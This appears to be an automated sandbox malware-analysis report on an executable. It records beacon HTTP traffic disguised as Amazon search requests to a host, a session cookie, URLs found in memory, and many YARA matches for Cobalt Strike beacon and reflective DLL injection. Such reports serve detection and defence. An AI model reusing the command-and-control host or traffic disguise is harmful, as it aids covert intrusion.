Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1Accept: /Host: p0.ssl.qhimg.comCookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: p0.ssl.qhimg.com.cdn.dnsv1.com

Source: unknown

HTTP traffic detected: POST /N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=1717084268&s=3717&dc_ref=http%3A%2F%2Fupdate.firefox.com.cn HTTP/1.1Accept: */*Content-Type: text/xmlX-Requested-With: XMLHttpRequestHost: p0.ssl.qhimg.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229272Connection: Keep-AliveCache-Control: no-cache

Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B6A000.00000004.00000020.00020000.00000000.sdmp, Z9fvmHepQC.exe, 00000000.00000002.3255702876.00000215D7D7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=17170
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
Source: Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books.t
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books2
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books?
Source: Z9fvmHepQC.exe, 00000000.00000002.3254282764.00000215D7799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksF
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksM
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksP
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksU6
Source: Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookscoo
Source: Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksf
Source: Z9fvmHepQC.exe, 00000000.00000002.3255579911.00000215D7CF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksfl
Source: Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookss
Source: Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookst
Source: Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksws
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksxyy
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksyyy
Source: Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books~
Source: Z9fvmHepQC.exe	String found in binary or memory: https://bytecodealliance.org/security.
Source: Z9fvmHepQC.exe	String found in binary or memory: https://github.com/bytecodealliance/wasmtime/issues/1271
Source: Z9fvmHepQC.exe	String found in binary or memory: https://github.com/bytecodealliance/wasmtime/issues/6530
Source: Z9fvmHepQC.exe, 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/bytecodealliance/wasmtime/issues/6530znCn
Source: Z9fvmHepQC.exe	String found in binary or memory: https://github.com/bytecodealliance/wasmtime/issues/6530znI
Source: Z9fvmHepQC.exe	String found in binary or memory: https://github.com/bytecodealliance/wasmtime/issues/677

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.Z9fvmHepQC.exe.21658210000.2.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.Z9fvmHepQC.exe.215d7691000.0.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2009341237.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2009488257.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2009224813.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2009315322.00000215D77ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2008352809.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
